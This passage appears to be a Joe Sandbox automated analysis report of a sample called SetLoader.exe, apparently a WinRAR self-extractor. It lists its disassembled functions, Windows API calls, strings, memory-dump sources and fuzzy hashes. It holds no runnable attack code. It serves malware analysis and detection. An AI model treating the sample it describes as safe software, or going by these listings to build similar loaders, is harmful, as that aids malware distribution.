                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _swprintf
                                              • String ID: %ls$%s: %s
                                              • API String ID: 589789837-2259941744
                                              • Opcode ID: 3f81797de217368b4c166abf8faa733d16a0935ba263a6c64e803d973d61de40
                                              • Instruction ID: d1548c27daa852e1ef2fe59d3a46c9b299c9ff24683a93e4ce34904702d564fe
                                              • Opcode Fuzzy Hash: 3f81797de217368b4c166abf8faa733d16a0935ba263a6c64e803d973d61de40
                                              • Instruction Fuzzy Hash: 635149F5248F34FAFA601A84BD02F657677AB05F00F10881AF3867C2D1C7A997416E5B
                                              Function 0062D41C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 149COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItemTextW.USER32(?,00000066,00001000,00000200), ref: 0062D591
                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0062D5B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ItemText
                                              • String ID: GETPASSWORD1$Software\WinRAR SFX
                                              • API String ID: 3367045223-1315819833
                                              • Opcode ID: 214ed87de265b907426c90a7c888b4c9a9f4c741b230a4f367d3715362b5e8cf
                                              • Instruction ID: e6a234403413252ffd2a7f6d89f0294a12bd634d545b501954383914ef703fb1
                                              • Opcode Fuzzy Hash: 214ed87de265b907426c90a7c888b4c9a9f4c741b230a4f367d3715362b5e8cf
                                              • Instruction Fuzzy Hash: D341C0B2904619ABEB30EB64EC45FFE77AEEB49300F104439F609E7181DB70A9448F65
                                              Function 0063A7C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SetLoader.exe,00000104), ref: 0063A800
                                              • _free.LIBCMT ref: 0063A8CB
                                              • _free.LIBCMT ref: 0063A8D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _free$FileModuleName
                                              • String ID: C:\Users\user\Desktop\SetLoader.exe
                                              • API String ID: 2506810119-365947073
                                              • Opcode ID: a47fa72daa632fd1d8045cdf6219b6f6e9880d30c6a715766bcc2d000831dbec
                                              • Instruction ID: cd4c57c22814559b988602bea1e04206ac9a4ffee01f0e5774d1334300d606f6
                                              • Opcode Fuzzy Hash: a47fa72daa632fd1d8045cdf6219b6f6e9880d30c6a715766bcc2d000831dbec
                                              • Instruction Fuzzy Hash: 8D319E71A00608EFDB25DFD9D8859DEBBFEEB85310F10506AF94897200D6704A42EBE2
                                              Function 006357F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0063581B
                                              • _abort.LIBCMT ref: 00635926
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: EncodePointer_abort
                                              • String ID: MOC$RCC
                                              • API String ID: 948111806-2084237596
                                              • Opcode ID: 6f872085bdc0923c58fe75046c22f6aef5b2414f761718a908f79fd631fab164
                                              • Instruction ID: 5abacaf9615f981a409cf0af964004f0b424d5296cd47d617803246befe45a20
                                              • Opcode Fuzzy Hash: 6f872085bdc0923c58fe75046c22f6aef5b2414f761718a908f79fd631fab164
                                              • Instruction Fuzzy Hash: 1A41277190064DEFCF15DF98C881AEEBBB6FF48314F188099FA06A7251D3359960DB94
                                              Function 0061F7B8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON
                                              Download Yara Rule
                                              APIs
                                              • __fprintf_l.LIBCMT ref: 0061F82D
                                              • _strncpy.LIBCMT ref: 0061F871
                                                • Part of subcall function 00623F47: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,006202A0,?,00000000,00000000,?,?,?,006202A0,?,?,00000050), ref: 00623F64
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                              • String ID: $%s$@%s
                                              • API String ID: 562999700-834177443
                                              • Opcode ID: bf8124fb787e44680c2dd80bc13e2fcf436662d6f290bf43037c6bdd7637ae6e
                                              • Instruction ID: 86b156ae002b66f0dd79c727f54fd477e9cd3d7fe4fd1bf0acd1f49ffa85c4db
                                              • Opcode Fuzzy Hash: bf8124fb787e44680c2dd80bc13e2fcf436662d6f290bf43037c6bdd7637ae6e
                                              • Instruction Fuzzy Hash: CC21A1729003099BDB20DFA4DD41FEE77BAFB15700F08052AF92197291E771E945CB55
                                              Function 00622F22 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                              Download Yara Rule
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0061CAA0,00000008,00000004,0061F1F0,?,00000000), ref: 00622F61
                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0061CAA0,00000008,00000004,0061F1F0,?,00000000), ref: 00622F6B
                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0061CAA0,00000008,00000004,0061F1F0,?,00000000), ref: 00622F7B
                                              Strings
                                              • Thread pool initialization failed., xrefs: 00622F93
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                              • String ID: Thread pool initialization failed.
                                              • API String ID: 3340455307-2182114853
                                              • Opcode ID: 19707f705b22bf678545d3d5c46988fb7e2be530368f3e74206cc5bc4d99f2fb
                                              • Instruction ID: 138f2a406eb5d6ab022cfcc7efacf19c9e737c0a694555f9c6d685bb5c4c1cc1
                                              • Opcode Fuzzy Hash: 19707f705b22bf678545d3d5c46988fb7e2be530368f3e74206cc5bc4d99f2fb
                                              • Instruction Fuzzy Hash: 1B119EB1644B19AFC3215F6ADD849E7FBEEFB96744F10482EF1DAC3200D6B159808B64
                                              Function 0062F950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00611366: GetDlgItem.USER32(00000000,00003021), ref: 006113AA
                                                • Part of subcall function 00611366: SetWindowTextW.USER32(00000000,006465F4), ref: 006113C0
                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0062F9B1
                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0062F9C5
                                              • SetDlgItemTextW.USER32(?,00000068), ref: 0062F9D4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ItemText$Window
                                              • String ID: RENAMEDLG
                                              • API String ID: 2802354418-3299779563
                                              • Opcode ID: 9f85439426675b5d16eaef4831aba18106fe4a1e160bd0142fb1da8fd9ed0fb0
                                              • Instruction ID: fe8f5b8c9519381c4a78303ff7742867d32a2a77281aacb0e8f2cd78373d0461
                                              • Opcode Fuzzy Hash: 9f85439426675b5d16eaef4831aba18106fe4a1e160bd0142fb1da8fd9ed0fb0
                                              • Instruction Fuzzy Hash: 3501F532A847207AD3155B24AD09FA7776FFB4A701F104435F245A2290CA629A819B65
                                              Function 006300EF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                              • API String ID: 0-56093855
                                              • Opcode ID: 452ca4da0d41d664142b31358c6adbc5813a67c9240214f16536a71e293d753e
                                              • Instruction ID: c84ff50046fc4c41a9c37054a8a756dea7152a85033211d0512fbec57456cbb8
                                              • Opcode Fuzzy Hash: 452ca4da0d41d664142b31358c6adbc5813a67c9240214f16536a71e293d753e
                                              • Instruction Fuzzy Hash: 5C01B171604705AFE7158F64EC64EA73BEBFB08791F001025F90593270C2718895DBE0
                                              Function 00614B3D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                              Download Yara Rule
                                              APIs
                                              • std::_Xinvalid_argument.LIBCPMT ref: 00614B42
                                                • Part of subcall function 0063106D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00631079
                                                • Part of subcall function 0063106D: ___delayLoadHelper2@8.DELAYIMP ref: 0063109F
                                              • std::_Xinvalid_argument.LIBCPMT ref: 00614B4D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                              • String ID: string too long$vector too long
                                              • API String ID: 2355824318-1617939282
                                              • Opcode ID: 10ba7fd13c5f4367bdf1cff9bce1f5ba98bccd6b9973e112abccc37e5b03c072
                                              • Instruction ID: 9c4cb47280296f2edd8117136b5be411b9211f2bbd461fc9a4dc1d4e7a8d391b
                                              • Opcode Fuzzy Hash: 10ba7fd13c5f4367bdf1cff9bce1f5ba98bccd6b9973e112abccc37e5b03c072
                                              • Instruction Fuzzy Hash: 46F027312003046B4B346F58DC45C8AB3EFEF85B20B11041AF945C3601CBB0E98087F6
                                              Function 0061C142 Relevance: 6.1, APIs: 4, Instructions: 135filetimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,?,?,00619343,?,?,?), ref: 0061C1EE
                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,?,00619343,?,?), ref: 0061C22C
                                              • SetFileTime.KERNEL32(00000800,?,?,00000000,?,?,?,00619343,?,?,?,?,?,?,?,?), ref: 0061C2AF
                                              • CloseHandle.KERNEL32(00000800,?,?,?,00619343,?,?,?,?,?,?,?,?,?,?), ref: 0061C2B6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: File$Create$CloseHandleTime
                                              • String ID:
                                              • API String ID: 2287278272-0
                                              • Opcode ID: 35f0f85d54e24ad4ca57e934e8a72e08fe87bffe2c7293112c6e5b20129239cd
                                              • Instruction ID: 2d6ef20ac1b370eaa69b54bb7edf1abc54af14b87ecce1fba90e38e56b61ef1a
                                              • Opcode Fuzzy Hash: 35f0f85d54e24ad4ca57e934e8a72e08fe87bffe2c7293112c6e5b20129239cd
                                              • Instruction Fuzzy Hash: DC41D631188381AEE320DB64DC56BEFB7EAAF89710F08091DB5D197281D674DA888752
                                              Function 0061BD61 Relevance: 6.1, APIs: 4, Instructions: 126COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 0061BD93
                                              • _wcslen.LIBCMT ref: 0061BDB6
                                              • _wcslen.LIBCMT ref: 0061BE4C
                                              • _wcslen.LIBCMT ref: 0061BEB1
                                                • Part of subcall function 0061C37A: FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,006187BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 0061C3A5
                                                • Part of subcall function 0061BBFF: RemoveDirectoryW.KERNEL32(00000001,?,00000001,00000000), ref: 0061BC1C
                                                • Part of subcall function 0061BBFF: RemoveDirectoryW.KERNEL32(?,00000001,?,00000800), ref: 0061BC48
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: _wcslen$DirectoryRemove$CloseFind
                                              • String ID:
                                              • API String ID: 973666142-0
                                              • Opcode ID: 64ad89134f8a49273694b1f3fa812ca311341d72fc802c5b0235cd8b640090ee
                                              • Instruction ID: 97b8e3c6e410fbfb7e22f10bcdb85674868a9d3ced57eba0169a179b0cd61b0a
                                              • Opcode Fuzzy Hash: 64ad89134f8a49273694b1f3fa812ca311341d72fc802c5b0235cd8b640090ee
                                              • Instruction Fuzzy Hash: F641E67250439096CB30EB74D8459EBB3EB9F84340F18581EFA8993242EB7499C9CAA5
                                              Function 0061849E Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 112COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,00000000,00000800,?,?,5CB4B331,00000000,?,00000000), ref: 00618596
                                                • Part of subcall function 00618C95: GetCurrentProcess.KERNEL32(00000020,?), ref: 00618CB2
                                                • Part of subcall function 00618C95: OpenProcessToken.ADVAPI32(00000000), ref: 00618CB9
                                                • Part of subcall function 00618C95: GetLastError.KERNEL32 ref: 00618CF6
                                                • Part of subcall function 00618C95: CloseHandle.KERNEL32(?), ref: 00618D05
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ErrorLastProcess$CloseCurrentHandleOpenToken
                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege$Tc
                                              • API String ID: 3931873934-167178998
                                              • Opcode ID: 1f06a5c7ceb1484bc8e2fe2279e755b9857acb7683793eaf14359ef5116fa851
                                              • Instruction ID: 7dbf57998185b155c5747fb985be266a167569dcf60c0c7d5bb710f43e18831f
                                              • Opcode Fuzzy Hash: 1f06a5c7ceb1484bc8e2fe2279e755b9857acb7683793eaf14359ef5116fa851
                                              • Instruction Fuzzy Hash: 3341BF71A04388AEDF60EF64DC46BEE77BBEF49304F08005DF906A7281DB755E848A65
                                              Function 0063EFD8 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00636F64,00000000,00000000,00637F99,?,00637F99,?,00000001,00636F64,?,00000001,00637F99,00637F99), ref: 0063F025
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0063F0AE
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0063F0C0
                                              • __freea.LIBCMT ref: 0063F0C9
                                                • Part of subcall function 0063BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00636A24,?,0000015D,?,?,?,?,00637F00,000000FF,00000000,?,?), ref: 0063BCC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                              • String ID:
                                              • API String ID: 2652629310-0
                                              • Opcode ID: d3115590a24bdad344e3c3f6f1810dcf0f67c1712eca6f28a8fefe43ef8fd501
                                              • Instruction ID: 224ba887451839c8955bd3dacf2689add250134c34258d3c2042b0a95e8a8b90
                                              • Opcode Fuzzy Hash: d3115590a24bdad344e3c3f6f1810dcf0f67c1712eca6f28a8fefe43ef8fd501
                                              • Instruction Fuzzy Hash: 78319D32E0021AABDB289F68DC95DEE7BA6EF45710F044229F804DB251EB35DD54CBE0
                                              Function 0062C5F3 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(00000000), ref: 0062C5F6
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0062C605
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0062C613
                                              • ReleaseDC.USER32(00000000,00000000), ref: 0062C621
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: de12387e9d21df4c11c6747191c79b23c5025c559673386c8211b8a991db8751
                                              • Instruction ID: b9541e4acb1dea2145859e5d3485376c136ee1f5cf36f745efd99e1ce6f5d121
                                              • Opcode Fuzzy Hash: de12387e9d21df4c11c6747191c79b23c5025c559673386c8211b8a991db8751
                                              • Instruction Fuzzy Hash: C6E0EC7199AB60ABD3255B60BC2DF9A3B56FB19723F042015F60996290DA704480CFD1
                                              Function 0062C79C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0062C629: GetDC.USER32(00000000), ref: 0062C62D
                                                • Part of subcall function 0062C629: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0062C638
                                                • Part of subcall function 0062C629: ReleaseDC.USER32(00000000,00000000), ref: 0062C643
                                              • GetObjectW.GDI32(?,00000018,?), ref: 0062C7E0
                                                • Part of subcall function 0062CA67: GetDC.USER32(00000000), ref: 0062CA70
                                                • Part of subcall function 0062CA67: GetObjectW.GDI32(?,00000018,?), ref: 0062CA9F
                                                • Part of subcall function 0062CA67: ReleaseDC.USER32(00000000,?), ref: 0062CB37
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
